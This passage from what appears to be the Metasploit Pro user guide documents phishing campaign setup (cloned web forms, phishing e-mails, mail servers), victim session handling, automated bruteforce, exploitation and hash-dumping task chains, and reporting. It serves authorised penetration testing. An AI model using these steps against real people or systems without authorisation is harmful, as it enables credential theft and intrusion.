Skip this step if you are using a redirect URL instead of a campaign redirect page. 1. From the campaign configuration page, click the Redirect Page button. 2. When the Web Page Configuration window appears, add the name of the redirect page to the end of the URL path. This is the URL that the human target sees in their browser's address bar. 3. Click the Next button to continue to the Web Page Content window. The following steps are similar to the ones you just used to create the landing page. 4. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
l
Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page. Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain some sort of web form.
5. Click the Save button to save the web page component.
Crafting a Phishing E-mail

1. From the campaign configuration page, click the E-mail button. 2. When the e-mail configuration window appears, enter the following header information:
l
Subject - The subject that displays in the message header and the subject line. From Address - The senders e-mail address. From Name - The senders name.
3. Click the Target list dropdown and choose a target list. 4. Click Next to continue to the E-mail Content window.
389
5. When the E-mail Content window appears, you need to create the body for the e-mail. Use the plain text or rich text editor to create the e-mail body. 6. After you create the content, you need to add a link to the landing page. To do this, either highlight the text in the e-mail content that you want to use as the display text or place the your cursor at the insertion point where you want the URL to appear in the e-mail. 7. Click the Insert Custom Attribute dropdown and select Link to Landing Page. 8. When the Insert a Landing Page window appears, enter the text that you want to display in the e-mail and click Insert. The link will appear as {% campaign_web_link 'DISPLAY TEXT', 'Landing' %} in the E-mail Content window. 9. Click Save to save the e-mail component.
Setting Up the Web Server

1. From the campaign configuration page, click the Web Server button. 2. When the Web Server Configuration window appears, choose one of the following options:
l
This servers IP address - Uses the IP address of the local machine. This servers host name - Uses the host name of the local machine. Custom - Uses the domain name, if DNS is set up and is reachable by the Metasploit instance.
3. In the Listening Port field, enter the port that you want to use to run the web server. You should specify a port that is typically used for HTTP traffic, such as 80 or 8080. 4. Click Save to save the web server settings.
Setting Up Local SMTP Settings for a Phishing Campaign

1. From the campaign configuration page, click the Email Server button. 2. When the Email Server Configuration window appears, define the following fields:
l
Host - The fully qualified mail server address (e.g., mail.domain.com). Port - The port that SMTP runs on. Typically, SMTP runs on port 25. Username - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server.
3. Click Save to save the e-mail server settings.
Sending an E-mail Alert

1. From the campaign configuration form, locate the Notifications area. 2. Select the Notify others before launching the campaign option.
390
3. When the Notification Settings window appears, enter the e-mail addresses of the people you want to send the alert to in the To field. 4. In the Subject field, enter the subject that you want the e-mail to display. By default, Metasploit Pro auto-fills the subject for you with a canned subject line. 5. In the Message field, enter the information, or body, that you want to send in the e-mail. For example, you may want to say something like: This is a company wide alert to inform you that we are starting our security awareness program. If you have any questions, please contact John Smith. 6. When you are done creating the notification e-mail, click the Save button.
Saving a Campaign
When you finish configuring the campaign components, you need to save the campaign.
l
To save a campaign, click the Done button on the campaignconfiguration page.
391
Working with Sessions

After you distribute the executable or file format exploit, you will need to check Metasploit Pro for sessions. If someone has run the executable or file format exploit, you will see a session logged against the victims machine. The session remains open until the victim powers off their computer or you manually terminate the session.
Checking for Open Sessions

All active and closed sessions are viewable from the Sessions area of the Metasploit UI. An active session indicates that you have a shell and can interact with the victims machine To check for open sessions:
l
From the project that contains your campaign, select the Sessions tab from the Tasks bar. You will see a list of open sessions under the Active Sessions area. Click on any session ID to view the actions that you can take against the victims system.
Cleaning Up Sessions
A session clean up closes the connection between the attacking machine and the victim and removes any artifacts from Metasploit Pro. You need to perform a session clean up to close sessions that you no longer need to access. 1. From the project that contains your campaign, select the Sessions tab from the Tasks bar. A list of open sessions appears under the Active Sessions area. 2. Select the sessions that you want to close and click the Clean Up button.
Working with Sessions
392
Social Engineering Report

The Social Engineering Campaign Details Report is a document that contains the comprehensive results and data for a particular campaign. It provides a detailed report of the findings that the campaign has collected and helps you organize your data to share with team members or across an organization. Like the other types of reports, the Campaigns Details Report can be generated in easily distributable formats, such as PDF, Word, RTF, and HTML. From the Social Engineering Campaign Details Report, you can view the following types of information:
l
A statistical overview of the campaign findings. Actions taken by the human targets in a campaign. Statistical analysis of human target behavior and easy identification of high risk targets. Browser and operating systems used by human targets in a phishing attack. Raw data from the components used to create a campaign. Any exploits that were used in the campaign and any sessions that were obtained from compromised systems. Remediation steps that can be implemented or can be recommended to reduce the threat of social engineering attacks across an organization.
Social Engineering Report Sections

The Social Engineering Campaign Details Report is made up of several different sections that provide you with a detailed look at the different areas of the campaign. The following table shows the sections that the Social Engineering Campaign Details Report includes: Included for Campaigns with Specific Components
Section Cover Page Executive Summary Social EngineeringFunnel Exploits Used Form Submissions Browser/PlatformInformation Appendix:Host Details
Included by Default X X X
Included for Campaigns that Opened Sessions
X X X X
393
Section Appendix: Human Targets Appendix: E-mails Appendix: Web Pages Appendix: Portable Files Appendix:Remediation Advice Appendix:Notes
Included by Default
Included for Campaigns with Specific Components X X X X
Included for Campaigns that Opened Sessions
X X
394
Cover Page
395
Executive Summary
396
Social Engineering Funnel
397
Exploits Used
398
Form Submissions
399
Appendix: Human Target Details
400
Appendix: Campaign Components
401
402
Remediation Advice
403
Report Notes
Generating a SocialEngineering Details Campaigns Report

You can generate the report at any time, regardless of the campaigns current state. If the campaigns state is running, the report will include the latest information from the moment you generate it. To generate the Social Engineering Campaign Details Report:
404
1. From within a project, click the Reports tab. 2. Click the Standard Report button. 3. When the New Report form appears, click the Report type dropdown and choose Social Engineering Campaign Details Report. 4. From the SE Campaign Detail Report Format options, choose the format you want to use to generate the report. The most common format is PDF. 5. In the Name field, enter the name that you want to assign to the report. This is the name that displays in on the Reports page in the Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the report name with the task number. 6. Click the Campaign dropdown menu and choose the campaign that you want to generate a report for. 7. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included; however, if the campaign does not have any data for a particular section, the section will be empty in the report. Note: If your campaign does not use an exploit or deliver a payload to the human target, your report will not show any data for the Exploits Used section or display any values for the % of systems exploited and compromised in the Social Engineering Funnel. 8. Select the Include web page HTML option if you want to include the raw HTML code for all the web page components that are part of the campaign. 9. If you want to e-mail the generated report, you can select the E-mail report option and enter a comma separated list of the e-mail addresses that you want to send the report to. Note: If you choose to e-mail the report, please make sure that you have the SMTP settings configured through the Global Settings. 10. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation. 11. When the report generation is complete, click the Reports tab to view a list of reports stored in the project. 12. Find the report you just generated. You can either view the report directly through your browser or you can download the report and save it to a location on your system.
Campaign Report Options

When you generate the Social Engineering Campaign Details report, there are several options that you can configure to customize the report.
405
Including the Raw HTML in the Report

Metasploit Pro automatically generates a preview of all web pages that are part of the campaign. An image preview of the web page will render in the report if the web page was used as part of a phishing campaign. If a web page was used to deliver malicious code, such as client-side exploits, Java applets, Browser Autopwn, or executable files, a preview will not display in the report. If you want to include the raw HTML that was used to create a web page, you can select the Include web page HTML option on the New Report form. When you enable this option, the raw code will be displayed under each web page preview in the report.
Including and Excluding Report Sections

By default, the Social Engineering Campaign Details Report includes all sections that are available for the report. However, only sections that are applicable to the campaign will have data present in the report. If a section does not have any data for Metasploit Pro to report on, then the section will be empty in the report. For example, if you choose to include the Exploits Used section in your report, but the campaign does not deliver a payload and does not successfully open a session, you will not see any data in the section. To include or exclude sections from your report, find the Report Sections area on the New Report form. You will see a list of all the sections that are available in the report, such as the Executive Summary, Social Engineering Funnel, Exploits Used, and Form Submission sections, as well as appendices for the report. Any sections that have a marked check box will automatically be included in the report. To remove any sections, deselect the check box.
E-mailing the Generated Report

Metasploit Pro enables you to automatically e-mail a report after it is generated. To e-mail a report, you need to enable the E-mail report option on the New Report form and specify the e-mails that you want to send the report to. The e-mails that you specify must be comma separated. Additionally, before you can e-mail a report, you need to set up the SMTP settings through the Global Settings. If you already have an existing global SMTP server for your campaigns, then Metasploit Pro will just use that mail server to send the e-mails. If you do not have a global SMTP server set up, go to Administration > Global Settings > SMTP Settings. You will need to provide Metasploit Pro with the information for your mail server. This information includes the credentials that Metasploit Pro will need to authenticate to the mail server and the domain and SMTP port information for the mail server.
Naming the Report

By default, Metasploit Pro uses a naming convention that uses the report type and the task number to name the report. You can change the name by replacing the default name in the Report Name field on the New Report form.
406
Chapter 18:
About Task Chains
Task Chains
To learn more about task chains, read the following topics:

l
Creating, Scheduling, and Running Task Chains Managing and Editing Task Chains
About Task Chains

Task chains enable you to automate and schedule the execution of a series of preconfigured tasks. They are useful for automating repetitive tasks that you need to perform regularly, such as scans and bruteforce attacks. A task chain comprises of a sequence of predefined tasks that you can schedule to run on a recurring basis or save to run on demand. It defines the tasks that will run, the settings for each task, and the conditions required for the execution of those tasks. You create a task chain by adding the tasks you want to it, configuring the settings you want the tasks to use, arranging the tasks in the order you want them to run, and defining the schedule that it should follow. Task chains are particularly useful if you want to run a sequence of tasks, but do not want to wait for each task to finish before you can run the next task. For example, if you routinely scan and bruteforce a set of targets hosts, you can string the tasks together so that they run sequentially at a specified time and date.
Task ChainUI Tour

Task chains tasks are separated into two different areas:
l
Task chains list - Displays all the task chains that are stored in the project. From this list, you can bulk manage task chains, view the current status for a task chain, view the contents of the task chain, and identify when a task chain will run next. Task chain configuration page - Displays the contents of a task chain. From this page, you can add, configure, and rearrange tasks, and you can create the schedule for the task chain.
Task Chains List

You can access the task chains list to perform the following tasks:
l
Create a new task chain Delete task chains Clone task chains Suspend task chains Run task chains View the current status for a task chain View the last time the task chain was run View the tasks that comprise a task chain
To access the task chains list, select Tasks > Chains from the Project tab bar.
About Task Chains
408
Task chains list
1. New Task Chain button - Opens the NewTask Chain configuration page. 2. Task chain bulk management buttons - Bulk manages task chains. You can do things like delete, clone, suspend, and run multiple task chains at once. 3. Task chains list - Lists all of the task chains that have been created for the project. Each task chain will have one of the following schedule icons:
l
Recurring Schedule - Indicates that the task chain repeatedly runs at a specified time and day. Single Schedule - Indicates that the task chain is scheduled to run once at a specified time and date. Not Scheduled - Indicates that the task chain does not follow a schedule. Suspended - Indicates that the task chain is inactive.
4. Task chain status - Displays one of the following statuses for each task chain:
l
Never run - The task chain has never run. Running - The task chain is currently running. Last run - The task chain last ran successfully at the specified date. Failed - The task chain was unable to finish successfully. If the task chain failed, it will display a link that you can click on to open the Task log and view the errors that occurred.
Task Chain Configuration Page

You access the task chain configuration page to create a new task chain or to modify an existing task chain. To access the task chain configuration page, select Tasks > Chains from the Project tab bar. When the task chains list appears, click the New Task Chain button.
Task ChainUI Tour
409
Task configuration page
1. Task Chain Name field - Displays an editable field for the task chain name. You can click on the field at any time to edit its name. 2. Schedule status - Indicates whether or not a schedule has been created for the task chain. It displays one of the following statuses:
l
Scheduled - Indicates that a schedule has been created for the task chain. Unscheduled - Indicates that a schedule has not been created for the task chain.
3. Schedule Now link - Opens the Task ChainScheduler, which enables you to schedule and suspend task chains. Additionally, you can enable the option to clear project data before the task chain runs. 4. Save and Run button - Saves the current task chain configuration and immediately runs the task chain. 5. Save button - Saves the current task chain configuration. The task chain will be available for you to run on demand or it will run according to the schedule that you have created for it. 6. Delete task - Removes the selected task from the task chain. 7. Clone task - Duplicates the selected task and adds it to the end of the task chain. 8. Reset task configuration - Clears all tasks from the task chain. 9. Task bubble - Represents a task. You can click on a task bubble to open the task configuration form. The selected task bubble will be highlighted in blue. Any task highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form. You can also click and drag the task bubble to move the task to a new position in the task chain.
Task ChainUI Tour
410
10. Add Task button - Displays the task list and enables you to select the task that you want to add to the task chain. 11. Task configuration form - Displays the options that you can configure for the task that is selected. Options will vary depending on the task that is selected.
Supported Tasks
Task chains can be used to execute the following tasks:
l
Discovery scan - Enumerate and fingerprint hosts on a target network. Import - Bring in data from supported third-party scanners, such as Nexpose and Nessus. Vulnerability scan - Scan a target network with Nexpose to find vulnerabilities on a target network. Web scan - Scan web forms and applications to find and exploit active content and forms. Bruteforce - Systematically attempt various combination of letters, numbers, and characters to crack credentials. Auto-exploitation - Automatically build an attack play by cross-referencing open ports, imported vulnerabilities, and fingerprint information to exploit modules. Single module run - Launch a module to perform targeted attacks against hosts or to gather additional data about hosts. You can add multiple modules to a task chain. MetaModules run - Launch one of the following MetaModules: the Single Password Testing MetaModule, the Known Credentials MetaModule, the SSHKey Testing MetaModule, the Pass the Hash MetaModule, the Firewall Egress Testing MetaModule, or the Passive Network Discovery MetaModule. Evidence collection - Collect evidence, such as screenshots, password hashes, and system files, from compromised hosts. Session clean up - Close any open sessions on compromised hosts. Report generation - Create a report to document findings and share test results.
Supported Tasks
411
Working with Task Chains

Task chains enable you to automate and schedule the execution of a series of repetitive tasks that you need to perform regularly, such as scans and bruteforce attacks. A task chain defines the tasks that will run, the settings for each task, and the conditions required for the execution of those tasks. You create a task chain by adding the tasks you want to it, configuring the settings you want the tasks to use, arranging the tasks in the order you want them to run, and defining the schedule that it should follow.
Creating a Task Chain

1. From within a project, select Tasks > Chains from the Project tab bar. The task chains list appears. 2. Click the New Task Chain button.
The New Task Chain page appears. 3. Enter a name for the task chain in the Task Chain Name field.
4. Click the '+' button to add a task.
The task list appears.
Working with Task Chains
412
5. Select a task from the list.
A new task bubble appears on the task chain and the task configuration page displays below the task chain.
6. Configure the task as you usually would. The steps for configuring a task vary based on task type. For more information on configuring a specific task, see one of the following topics:
l
Running a Discovery Scan on page 135 Importing Scan Data on page 150 Running a Nexpose Scan on page 205 Running a Bruteforce Attack on page 226 Running a Module on page 119 Running Automated Exploits on page 238
After you configure the task, you can add additional tasks to the task chain. When you finish building the task chain, you can create a schedule for the task chain or you can save the task chain to run on demand.
Creating a Task Chain
413
For more information on scheduling a task chain, see Task Chain Schedules on page 427 .
Adding a Task to a Task Chain

To add a task to a task chain, click the '+' Add task button.
When you click the '+' button, the task list appears and shows you the tasks that can be added to the task chain.
After you add the task, a new task bubble appears on the task chain, and the task configuration form displays below the task chain.
The task bubble displays the tasks' position in the task chain. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth. You can click the task bubble and drag it to reposition it in the task chain. Any task bubble highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form.
Adding a Task to a Task Chain
414
Cloning a Task
When you clone a task, you are adding a copy of the task to the end of the task chain. You can move or modify the task as needed. Note: You should only clone tasks that are highlighted in blue, which indicate that there are no errors in the task configuration. To clone a task, click the task you want to clone to select it.
Then, click the Clone button located in the task chain tool bar.
The cloned task will be added to the end of the task chain.
If you need to reposition the task in the task chain, click on the task and drag it to the position you want it to appear in the task chain.
Rearranging Tasks in a Task Chain

To move a task to a different position in the task chain, click the task bubble and drag it to reposition it in the task chain.
Cloning a Task
415
After you reposition the task,the position that displays in the task bubble is updated. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth.
Adding a Post-Exploitation Module to a Task Chain

Post-exploitation is the phase that occurs after the system successfully exploits the target. It is the process that you use to identify information that helps you gain further access to the target or to additional systems within the targets internal networks. When you manually run an attack against a target and get an active session, Metasploit Pro provides actions that you can take against the session. The actions are available on the session page and vary based on the session type, such as shell or Meterpreter, and system information. For example, if the system opens a shell on a target, the actions that you can take include opening a command shell that connects to the target and collecting system data. If the system opens a Meterpreter session, you can do things like set up a proxy pivot or access the file system. Using the target system information, automatically displays the post-exploitation modules that are applicable to the target. This makes it easy for you to identify and choose the post-exploitation modules that you want to run against the target. When you work with task chains, the post-exploitation process is completely manual. You must search for the post-exploitation modules that you want to use based on the information that you have about the target. For example, if you know the target is a Windows system, and you want to capture screenshots, you may want to add a module task to your task chain that runs post/Windows/gather/screenshot. Or if you know your target is a Linux system, and you want to collect hashes, you may want to run post/linux/gather/hashdump.
Removing a Task from a Task Chain

To remove a task from a task chain, click the task you want to delete to select it.
Adding a Post-Exploitation Module to a Task Chain
416
Then, click the Delete button located in the task chain toolbar.
A dialog window will appear and prompt you to confirm that you want to delete the task. Click OK to delete the task from the task chain. You can only remove one task at a time. If you need to remove multiple tasks, please repeat the steps listed above or reset the task chain. For more information on resetting the task chain, see Resetting a
Task Chain on page 418.

Note: After you remove a task from the task chain, you will not be able to recover the task. You will need to rebuild the task.
Clearing the Project Data before a Task Chain Runs

If you want to clear the project data before the task chain runs, you can enable the Delete previous project data option.
Clearing the Project Data before a Task Chain Runs
417
Any and all data stored in the project, including hosts, collected evidence, session information, reports, and credentials will be wiped from the project. Enable this option only if you want to start the task chain with an empty project. Data cannot be recovered after it has been cleared from the project.
Resetting a Task Chain

You can reset a task chain to clear all of the tasks from it. A task chain reset will remove all tasks and their configurations from the task chain. This action cannot be reverted. To reset a task chain, click the Reset button located in the task chain toolbar.
A dialog window will appear and prompt you to confirm that you want to reset the task chain. Click OK to reset it.
Running a Task Chain

You can run task chains on demand or outside the scope of its schedule. To run a task chain, select Tasks >Chains from the Project tab bar. Select the task chain that you want to run.
Click the Run Now button.
Resetting a Task Chain
418
A dialog window will appear and prompt you to confirm that you want to run the task chain. Click OK to run it.
Running a Task Chain
419
Managing and Editing Task Chains

Task chains are a series of preconfigured tasks that execute in sequential order. They are editable, cloneable, and suspendable, which makes it easy for you to manage and reuse task chains. For example, if you have an existing task chain that you want to reuse with a slightly different configuration, you can clone and customize that task chain.
Editing a Task Chain

You can edit a task chain to modify its existing settings. To edit a task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, click on the name of the task chain that you want to edit.
When the task chain configuration page opens, you can do things like add, clone, and remove tasks; tweak settings for a particular task; and update the schedule for the task chain.
Managing and Editing Task Chains
420
Cloning a Task Chain

When you clone a task chain, you are making a copy of it. Cloning enables you to reuse an existing task chain configuration. For example, you may want to clone a task chain if you want to run the same task chain on a different schedule or if you want to run a task chain with slight modifications. To clone a task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, select the task chain that you want to clone.
Click the Clone button.
The task chain configuration form appears.The form retains the configuration settings that you used to create the original task chain. You can run the task chain as is, or you can modify its settings. The cloned task chain will use the following naming convention: [task-chain-name]-timestamp.
Suspending a Task Chain

You can suspend a task chain if you want the task chain to ignore its current schedule. When you suspend a task chain, it will not run again until you re-enable the schedule or manually run it yourself. Note: When you suspend a running task chain, the task chain will be canceled. Do not suspend a running task chain unless you intend to stop it. To suspend a task chain, select Tasks > Chains from the Project tab bar.
Cloning a Task Chain
421
When the Task Chains list appears, select the task chain whose schedule you want to suspend. The task chain that you select must be scheduled and in an unsuspended state. These task chains will have a scheduled icon located next to them. Note: If you need to bulk suspend task chains, you can select multiple task chains.
Click the Suspend button.
The schedule icon changes to the suspended icon.
Suspending a Task Chain
422
To unsuspend a task chain, select it and click the Unsuspend button. The task chain you selected must be in a suspended state.
Updating the Schedule for a Task Chain

To edit the schedule for an existing task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, click on the name of the task chain whose schedule you want to edit.
When the task chain configuration page opens, click on the Schedule Now link to open the scheduler.
The scheduler will display the current schedule. You can use the scheduler to update the existing settings.
Stopping a Running Task Chain

To cancel a running task chain, select Tasks >Chains from the Project tab bar. Select the running task chain you want to cancel and click the Stop button. A running task chain will show a running icon in the Status column.
Updating the Schedule for a Task Chain
423
Any data that was collected before you stopped the tasks will still be stored in the project.
Stopping All Running Tasks

To stop all tasks that are currently running in Metasploit Pro, select Administration > Global Settings. Scroll down to the bottom of the page and find the Stop all tasks button. This will immediately stop all active tasks. Please alert your other team members if you intend to cancel their running tasks.
Any data that was collected before you stopped the tasks will still be stored in the project.
Viewing the Tasks Log

The Tasks Log shows you the events for a particular task. To view the task log for a task, select Tasks > Show Tasks from the Project tab bar. When the task log appears, find and click on the task you want to view.
The Tasks Log appears and shows you the status and activity for the task.
Stopping All Running Tasks
424
Cleaning Up Open Sessions

A task chain that includes a task like bruteforce, exploit, or module run may open a session on the target system. An open session enables you to interact with the compromised system. When you are done with a session, you should close the connection with the target. To clean up and close open sessions, you should add a clean up task to the task chain. As a rule of thumb, the clean up task should be the last task in the task chain. This ensures that has the opportunity to collect system information and take advantage of open sessions before it closes them.
Deleting a Task Chain

When you delete a task chain, it will be permanently removed from the project, and you will no longer be able to access or run it. You will not be able to recover a deleted task chain. To delete a task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, select the task chain that you want to delete.
Click the Delete button.
Cleaning Up Open Sessions
425
Deleting a Task Chain
426
Task Chain Schedules

A schedule defines how often and when a task chain runs. You can choose to run the task chain hourly, at specific time on certain week days, monthly at a set frequency, or you can save the task chain to run as you need. For example, let's say you want to run the task chain every day at 12 a.m. You will need to configure the task chain to run daily at midnight starting on a specific date. You can also set optional conditions--such as the maximum run time for the task chain and the expiration date for the schedule. The following image shows the Task Chain Scheduler and the configuration for the previous example:
Schedule Options
There are a few different schedule options that you can use to control when a task chain runs. The following schedule options are available:
l
Once - Runs the task chain once on a specific date. For example, you may want to choose this option if you want to run the task chain once at midnight on December 15, 2014. Hourly - Runs the task chain every hour. For example, you may want to choose this option if you want to run the task chain at half past every hour. Daily - Runs the task chain every day. For example, you may want to choose this option if you want to run the task chain every day at midnight. Weekly - Runs the task chain on certain days of the week. For example, you may want to choose this option if you want to run the task chain every Monday and Wednesday at midnight. Monthly - Runs the task chain on a specific day of the month. For example, you may want to choose this option if you want to run the task chain on the last day of each month.
Task Chain Schedules
427
Scheduling a TaskChain
1. From within the project that contains the task chain you want to schedule, select Tasks >Chains from the Project tab bar. 2. Find and open the task chain you want to schedule.
The configuration form for the task chain opens. 3. Click the Schedule Now link.
The scheduler appears. 4. Click the Run Chain dropdown to display the recurrence options.
You can choose once, hourly, daily, weekly, or monthly. The options that appear depend on the recurrence option you have selected.
Scheduling a TaskChain
428
For example, if you want to run the task chain daily, you will need to specify if the task chain should run every day, every 2 days, every 3 days, and so on. You must also indicate the date and time you want the task chain to start. 5. Click the Max Duration dropdown and choose a time limit for the task chain. (Optional)
6. Click the Done button to save the schedule. The scheduler closes and the task chain configuration page appears. 7. Save the task chain. The task chain will run according to the date and time you have scheduled.
Suspending a Schedule
You can indefinitely suspend a schedule from the Scheduler or from the Task Chains List. When you suspend a task chain, it will not run again until you re-enable the schedule or manually run it yourself. To suspend the schedule, select the Suspend option located on the Scheduler.
Suspending a Schedule
429
To unsuspend the schedule, deselect the Suspend option located on the Scheduler.
Setting the Maximum Duration for a Task Chain

The maximum duration is the time limit that you want to enforce on a task chain. You set a maximum duration if you do not want a task chain to exceed a certain time frame. Once the task chain reaches the maximum duration, it will be stopped in its current state. All data that has been collected until that point will be saved in the project. To set a time limit on the task chain, use the Max Duration option located on the scheduler.
430
If you do not want to set a time limit on the task chain, you can set the maximum duration or Never Expire.
431
Chapter 19:
Reports
A report takes a snapshot of the data in a project at a particular moment in time and compiles the results into a tangible output format. You create a report to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so that they can quickly prioritize, reproduce, and remediate their vulnerabilities. Most of the time, you will generate a report to create a distributable document that presents both high-level statistics and detailed critical findings. Whether someone wants an at a glance summary or needs the technical details of your penetration test, the report will be able to cater to both ends of the viewer spectrum. To work with reports, you will need to use the Metasploit Pro web interface, which provides you with robust and comprehensive reporting capabilities. To learn more about reports, read the following topics:
l
About Reports on page 433 Metasploit Report Types on page 1 Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports on page 1 Customizing Standard Reports on page 454 Working with Custom Templates on page 461
About Reports
A report takes a snapshot of the data in a project at a particular moment in time. It enables you to compile data from a project so that you can present it in a tangible output format. You create reports to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so they can prioritize, reproduce, and remediate their vulnerabilities. By understanding the results of a penetration test, an organization can learn how they can mitigate weaknesses in their security infrastructure.
Report Output Formats

Metasploit Pro enables you to generate a report in the following output formats:
l
PDF - Adocument that can be opened and viewed with Adobe Reader.This is the default type. HTML - A file that can be opened and viewed in a Web browser. RTF - A document that uses text-based encoding, which enables its content to be viewed in most major word processing applications. You can use this format if you want to edit or annotate the report or if you need to distribute the report across multiple platforms. Word - A document that can be opened, viewed, and edited in Microsoft Word. You can use this format if you want to edit or annotate the report.
You can generate any combination of output formats for each report. Each instance will be an artifact of the report. What Are Report Artifacts? An artifact refers to the output formats that have been generated for a report. For example, a PDF and RTF version of the same Social Engineering Report are artifacts of the report. To view the artifacts for a report, select Reports >Show reports from the Project tab bar. The Reports List shows all the reports that have been generated for the project and displays the artifacts for each report in the File Formats column.
About Reports
433
Reports Directory
When Metasploit Pro generates a report, it stores a copy of the file in /path/to/Metasploit/apps/pro/reports/artifacts. The files that are stored in this directory will match the list of reports displayed in the web interface. You can go to the reports directory to download or view reports; however, you should not make any changes directly to the default reports directory. If you need to modify the reports, you should make a copy of the reports directory and make your changes from the new directory. Any changes that you make directly to the reports can cause disparities between the metadata that displays for the file in the webinterface and the file itself. If you need to remove reports from a project, you should do it from within the web interface. Do not delete them directly from the reports directory.
Viewing Reports Generated with Metasploit Pro 4.8 and Earlier

All reports generated with Metasploit Pro 4.8 and earlier are stored in the /path/to/Metasploit/apps/pro/reports/legacy_reports directory. These reports are not accessible from the web interface.
Report Logs
The report log maintains a historical record of all report-related events. Metasploit Pro automatically updates the report log each time you generate a report. If you experience any issues with a report, you can view the report log to find stack trace errors and troubleshoot them.
Viewing the Report Log

You can find and view the report log in the following directory: /path/to/Metasploit/apps/pro/ui/log. The report log is named reports.log.
Clearing the Report Log

To clear the report log, you will need remove it from the log directory, which is located at /path/to/Metasploit/apps/pro/ui/log. Metasploit Pro will generate a new report log if it detects that one does not exist. Note: Before you delete the report log, you should make a copy of it in case you need it for reference later.
Reports Directory
434
Using the Reporting Interface

The Reports page is divided into four different areas, which enables you to perform the following tasks:
l
View reports Generate standard reports Generate custom reports
Generating a Standard Report

The Standard Report Form enables you to specify the options you want to use to create your report, such as the report type and output format.
1. Report Type - Choose from one of the following report types: Activity, Audit, Authentication Tokens, Collected Evidence, Compromised and Vulnerable Hosts, FISMACompliance, PCICompliance, Services, Social Engineering, and WebApplication Assessment.
435
2. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word. 3. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report. 4. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report. 5. Cover Logo - Specify the logo that you want to add to the cover page of the report. 6. Sections - Choose the sections you want to include in the report. By default, all report sections are selected. The report sections that are available vary between report types. The form automatically displays the sections that are supported for the report type that is currently selected. 7. Options - Use these options to manage confidential data and graphics in a report. The report form displays the options that are applicable for the report type selected. The following options may be available for each report:
l
Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from a report. The report displays the user name and a blank password. Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report. Include web page HTML (in addition to image preview) - Includes a preview of the web pages used in the social engineering campaign. (Social Engineering Campaign Details Report only)
8. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.
Generating a Custom Report

The Custom Report Form enables you to specify the options you want to use to customize your report.
436
1. Custom Report Collateral - Upload Jasper templates and logos that can be used for customizing reports. Supported collateral types include Jasper report templates and image files, such as JPEG, PNG, andGIF. 2. Custom Report Template - Select the template that you want to use to create your report. 3. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word. 4. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report. 5. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report. 6. Cover Logo - Specify the logo that you want to apply to the report. 7. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.
437
Metasploit Report Types

Metasploit Pro offers several different reports to help you control the scope of data that is presented in each report.Each report focuses on a particular type of data that is stored within a project. Since projects can contain a multitude of information, Metasploit Pro offers several different report types to help you control the scope of data that you present to an organization.Each report focuses on a particular set of data that is stored within a project. For example, you can create a report that contains social engineering data or vulnerability validation results.
Understanding Report Types

The following sections provide an overview of each report type, the options that are available for it, and the sections that it includes.
ActivityReport
Description Output formats Generates a human readable version of the activity log. PDF, HTML, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Cover, Project Summary, and Task Details
Audit Report
Description Output formats Provides a comprehensive and detailed report of the project findings. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
Metasploit Report Types
438
Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Executive Summary and Tags, Compromised Hosts, Compromised Credentials, Report sections Report directory Report template Discovered OSes, Discovered Hosts, Host Details, Discovered Services, and Web Sites /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
Authentication Tokens Report

